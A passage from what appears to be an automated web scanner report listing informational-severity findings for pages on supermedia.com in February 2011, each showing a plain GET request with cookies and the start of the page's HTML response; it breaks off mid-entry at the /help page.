Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Careers Core Values | SuperMedia.com Advertising</title>



...[SNIP]...

27.38. https://www.supermedia.com/careers/employees-retirees  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/employees-retirees

Request

GET /careers/employees-retirees HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Employees & Retirees | SuperMedia.com Advertising</title>



...[SNIP]...

27.39. https://www.supermedia.com/careers/job-search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/job-search

Request

GET /careers/job-search HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online advertising Sales jobs and new media careers at SuperMedia</title>



...[SNIP]...

27.40. https://www.supermedia.com/careers/professional-development  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /careers/professional-development

Request

GET /careers/professional-development HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Professional Development | SuperMedia.com Advertising</title>



...[SNIP]...

27.41. https://www.supermedia.com/client-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions

Request

GET /client-solutions HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Solutions | SuperMedia.com Advertising</title>



...[SNIP]...

27.42. https://www.supermedia.com/client-solutions/client-stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/client-stories

Request

GET /client-solutions/client-stories HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:55 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Client Stories Sign Up | SuperMedia.com Advertising</title>



...[SNIP]...

27.43. https://www.supermedia.com/client-solutions/local-retail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/local-retail

Request

GET /client-solutions/local-retail HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Retail Advertising | SuperMedia.com Advertising</title>



...[SNIP]...

27.44. https://www.supermedia.com/client-solutions/local-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/local-service

Request

GET /client-solutions/local-service HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Service Providers | SuperMedia.com Advertising</title>



...[SNIP]...

27.45. https://www.supermedia.com/client-solutions/national-brand-agencies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/national-brand-agencies

Request

GET /client-solutions/national-brand-agencies HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>National Brand and Agency Building | SuperMedia.com Advertising</title>



...[SNIP]...

27.46. https://www.supermedia.com/client-solutions/share-the-wealth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/share-the-wealth

Request

GET /client-solutions/share-the-wealth HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:23 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Share the wealth</title>


<link type="text/css" rel
...[SNIP]...

27.47. https://www.supermedia.com/client-solutions/web-based-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /client-solutions/web-based-business

Request

GET /client-solutions/web-based-business HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Based Business Advertising | SuperMedia.com Advertising</title>



...[SNIP]...

27.48. https://www.supermedia.com/community/barter-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /community/barter-network

Request

GET /community/barter-network HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Barter Network | SuperMedia.com Advertising</title>



...[SNIP]...

27.49. https://www.supermedia.com/community/newsletter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /community/newsletter

Request

GET /community/newsletter HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Newsletter | SuperMedia.com Advertising</title>



...[SNIP]...

27.50. https://www.supermedia.com/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail

Request

GET /direct-mail HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Direct Mail Advertising - Reach Local Customers with Direct Mail | SuperMedia.com Adverti
...[SNIP]...

27.51. https://www.supermedia.com/direct-mail/call-tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/call-tracking

Request

GET /direct-mail/call-tracking HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Call Tracking | SuperMedia.com Advertising</title>



...[SNIP]...

27.52. https://www.supermedia.com/direct-mail/compare-direct-mail-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/compare-direct-mail-options

Request

GET /direct-mail/compare-direct-mail-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Compare Direct Mail Options | SuperMedia.com Advertising</title>



...[SNIP]...

27.53. https://www.supermedia.com/direct-mail/postcards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/postcards

Request

GET /direct-mail/postcards HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Direct Mail Postcards | SuperMedia.com Advertising</title>



...[SNIP]...

27.54. https://www.supermedia.com/direct-mail/shared-card-packs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /direct-mail/shared-card-packs

Request

GET /direct-mail/shared-card-packs HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Shared Card Packs Mailers | SuperMedia.com Advertising</title>



...[SNIP]...

27.55. https://www.supermedia.com/directory-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /directory-options

Request

GET /directory-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Directory Advertising Options | SuperMedia.com Advertising</title>



...[SNIP]...

27.56. https://www.supermedia.com/domain-names  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /domain-names

Request

GET /domain-names HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:24 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Register a Domain Name | SuperMedia.com Advertising</title>



...[SNIP]...

27.57. https://www.supermedia.com/ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce

Request

GET /ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Stores for Small Business Ecommerce | SuperMedia.com</title>



...[SNIP]...

27.58. https://www.supermedia.com/ecommerce/basic-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/basic-ecommerce

Request

GET /ecommerce/basic-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Basic Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...

27.59. https://www.supermedia.com/ecommerce/compare-ecommerce-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/compare-ecommerce-options

Request

GET /ecommerce/compare-ecommerce-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Compare Online Store Options | SuperMedia.com Advertising</title>



...[SNIP]...

27.60. https://www.supermedia.com/ecommerce/getting-started  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/getting-started

Request

GET /ecommerce/getting-started HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Getting Started with an Online Store | SuperMedia.com</title>



...[SNIP]...

27.61. https://www.supermedia.com/ecommerce/premium-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/premium-ecommerce

Request

GET /ecommerce/premium-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Premium Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...

27.62. https://www.supermedia.com/ecommerce/unlimited-ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /ecommerce/unlimited-ecommerce

Request

GET /ecommerce/unlimited-ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Unlimited Online Stores for Ecommerce | SuperMedia.com</title>



...[SNIP]...

27.63. https://www.supermedia.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help

Request

GET /help HTTP/1.1
